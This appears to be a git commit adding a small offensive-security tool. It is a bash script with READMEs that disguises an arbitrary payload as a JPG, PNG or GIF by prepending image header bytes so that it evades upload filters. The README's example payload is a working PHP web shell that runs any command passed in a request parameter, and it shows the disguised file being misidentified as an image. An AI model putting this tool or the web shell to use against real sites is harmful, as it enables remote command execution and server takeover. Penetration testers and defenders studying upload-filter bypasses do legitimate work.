Jonathan Hodgson
5 years ago
parent
aaaca6ea82
commit
4e40323a73
6 changed files with 106 additions and 0 deletions
@ -0,0 +1,36 @@ |
||||
# Scripts for payload generation |
||||
|
||||
## generateImageFromPayload |
||||
|
||||
This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded. |
||||
|
||||
To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php |
||||
|
||||
```php |
||||
<?php |
||||
if( isset( $_REQUEST['jh'] ) ): |
||||
system( $_REQUEST['jh'] ); |
||||
endif; |
||||
``` |
||||
|
||||
If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`. |
||||
|
||||
``` |
||||
. |
||||
├── payload.php |
||||
└── payload.php.jpg |
||||
``` |
||||
|
||||
After running `file` on both, you will see that it incorrectly identifies the second as an image. |
||||
|
||||
```sh |
||||
file payload.php* |
||||
payload.php: PHP script, ASCII text |
||||
payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16 |
||||
``` |
||||
|
||||
The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g. |
||||
|
||||
``` |
||||
generateImageFromPayload payload.php png |
||||
``` |
||||
@ -0,0 +1,65 @@ |
||||
#!/usr/bin/env bash |
||||
|
||||
# This script takes a payload and disguises it as an image. |
||||
|
||||
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" |
||||
CURRENT=$(pwd) |
||||
|
||||
PAYLOAD="$1" |
||||
IMAGETYPE="${2:-jpg}" |
||||
# Make sure the image type is lower case |
||||
IMAGETYPE=$(echo "$IMAGETYPE" | tr '[:upper:]' '[:lower:]') |
||||
|
||||
# This function prints the usage |
||||
function printUsage(){ |
||||
echo "Usage: $(basename "$0") PAYLOAD TYPE" |
||||
echo "" |
||||
echo "Disguises a payload as an image" |
||||
echo "" |
||||
echo -e "PAYLOAD\t\tThe payload to use, currently only supports a file in CWD (Required)" |
||||
echo -e "TYPE\t\tThe type of image (jpg, png, gif) (default: jpg)" |
||||
} |
||||
|
||||
function getPayload(){ |
||||
local payload="$CURRENT/$PAYLOAD" |
||||
echo "$payload" |
||||
if [ -f "$payload" ]; then |
||||
exit 0 |
||||
else |
||||
# Add stuff here if we want to look in another folder for payloads at some point |
||||
exit 1 |
||||
fi |
||||
} |
||||
|
||||
function getTemplate(){ |
||||
local template="$SCRIPTPATH/templates/payload.$IMAGETYPE" |
||||
echo "$template" |
||||
if [ -f "$template" ]; then |
||||
exit 0 |
||||
else |
||||
exit 1 |
||||
fi |
||||
} |
||||
|
||||
function getDestination(){ |
||||
echo "$CURRENT/$PAYLOAD.$IMAGETYPE" |
||||
exit 0 |
||||
} |
||||
|
||||
if template=$(getTemplate); then |
||||
if payload=$(getPayload); then |
||||
# Do copy stuff |
||||
destination=$(getDestination) |
||||
cp "$template" "$destination" |
||||
cat "$payload" >> $destination |
||||
else |
||||
"No such payload $payload" |
||||
echo "" |
||||
printUsage |
||||
fi |
||||
else |
||||
echo "No such template $template" |
||||
echo "" |
||||
printUsage |
||||
exit 1 |
||||
fi |
||||
@ -0,0 +1,5 @@ |
||||
# Image templates |
||||
|
||||
These images are not real images. They take the first 20 bites of an example image of each type. |
||||
|
||||
By adding code to these, you will be able to evade many upload filters that only allow images |
||||
|
After Width: | Height: | Size: 20 B |
|
After Width: | Height: | Size: 20 B |
|
After Width: | Height: | Size: 21 B |
Loading…
Reference in new issue